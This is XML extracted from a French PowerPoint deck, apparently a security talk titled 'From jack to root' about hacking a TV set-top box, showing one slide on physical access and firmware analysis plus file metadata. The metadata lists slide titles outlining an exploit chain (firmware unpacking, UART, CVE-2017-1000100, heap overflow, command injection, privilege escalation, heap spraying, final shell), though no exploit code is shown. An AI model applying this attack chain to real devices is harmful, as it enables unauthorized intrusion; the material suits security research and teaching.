                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16C903B5-1DD2-A53A-1A01-DE43F98E6EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696B08F4-BD93-862C-6DBE-06C51A0E748B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du texte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{344D9B1E-26E1-E658-C11C-817FDCA56F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6829B4-C547-C225-7A57-1CC4819EBCE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3014320-D5A5-4020-5F62-26A9BBE39A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1202364"/>
            <a:ext cx="2473965" cy="3494906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5817E12-988A-81DE-0D2F-25D91EFB7235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3681061" y="2568164"/>
            <a:ext cx="4273573" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lien du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> dans la procédure de mise à jour par USB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2754134300"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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tat Marianne">
      <a:majorFont>
        <a:latin typeface="Marianne"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Marianne"/>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1" id="{980F133E-2982-AC44-99D0-2303C38D6BFF}" vid="{337F7304-70ED-DD49-B687-29B9A1C55EB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522</TotalTime>
  <Words>5258</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (16:9)</PresentationFormat>
  <Paragraphs>807</Paragraphs>
  <Slides>57</Slides>
  <Notes>11</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57</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="66" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Marianne</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Thème</vt:lpstr>
      <vt:lpstr>From jack to root</vt:lpstr>
      <vt:lpstr>whoami</vt:lpstr>
      <vt:lpstr>Le programme télé</vt:lpstr>
      <vt:lpstr>Reconnaissance</vt:lpstr>
      <vt:lpstr>Le produit</vt:lpstr>
      <vt:lpstr>Surface d’attaque</vt:lpstr>
      <vt:lpstr>FUN</vt:lpstr>
      <vt:lpstr>Accès physique</vt:lpstr>
      <vt:lpstr>Récupérer le firmware</vt:lpstr>
      <vt:lpstr>Firmware format</vt:lpstr>
      <vt:lpstr>Unpack firmware</vt:lpstr>
      <vt:lpstr>Firmware format</vt:lpstr>
      <vt:lpstr>Firmware analysis</vt:lpstr>
      <vt:lpstr>Filesystem analysis</vt:lpstr>
      <vt:lpstr>Filesystem analysis</vt:lpstr>
      <vt:lpstr>UART : Universal Asynchronous Receiver Transmitter</vt:lpstr>
      <vt:lpstr>Baudrate</vt:lpstr>
      <vt:lpstr>DIY </vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Recherche de vulnérabilités</vt:lpstr>
      <vt:lpstr>Scénario</vt:lpstr>
      <vt:lpstr>Surface d’attaque réseau</vt:lpstr>
      <vt:lpstr>Webdriver</vt:lpstr>
      <vt:lpstr>Surface d’attaque navigateur</vt:lpstr>
      <vt:lpstr>API Javascript</vt:lpstr>
      <vt:lpstr>downloadAsync</vt:lpstr>
      <vt:lpstr>CVE-2017-1000100</vt:lpstr>
      <vt:lpstr>CVE-2017-1000100</vt:lpstr>
      <vt:lpstr>God memory leak</vt:lpstr>
      <vt:lpstr>Heap overflow</vt:lpstr>
      <vt:lpstr>Heap overflow</vt:lpstr>
      <vt:lpstr>Heap overflow</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>Command injection</vt:lpstr>
      <vt:lpstr>Elévation de privilège</vt:lpstr>
      <vt:lpstr>Trouver un processus interessant</vt:lpstr>
      <vt:lpstr>BigBang</vt:lpstr>
      <vt:lpstr>BigBang configuration</vt:lpstr>
      <vt:lpstr>Capabilities</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Post-exploitation</vt:lpstr>
      <vt:lpstr>Post-exploitation : Théorie</vt:lpstr>
      <vt:lpstr>Post-exploitation : Kernel-land</vt:lpstr>
      <vt:lpstr>Post-exploitation : User-land</vt:lpstr>
      <vt:lpstr>Post-exploitation</vt:lpstr>
      <vt:lpstr>QUID du Heap overflow ?</vt:lpstr>
      <vt:lpstr>Arbitrary free</vt:lpstr>
      <vt:lpstr>Heap chunks</vt:lpstr>
      <vt:lpstr>Fastbins</vt:lpstr>
      <vt:lpstr>V8 internals</vt:lpstr>
      <vt:lpstr>Forge fake chunk with float </vt:lpstr>
      <vt:lpstr>Heap spraying</vt:lpstr>
      <vt:lpstr>Find free chunk</vt:lpstr>
      <vt:lpstr>Call system</vt:lpstr>
      <vt:lpstr>Final shell</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</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DUBIER</dc:creator>
  <cp:lastModifiedBy>Thomas DUBIER</cp:lastModifiedBy>
  <cp:revision>99</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-13T15:22:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-05T11:27:56Z</dcterms:modified>
</cp:coreProperties>
</file>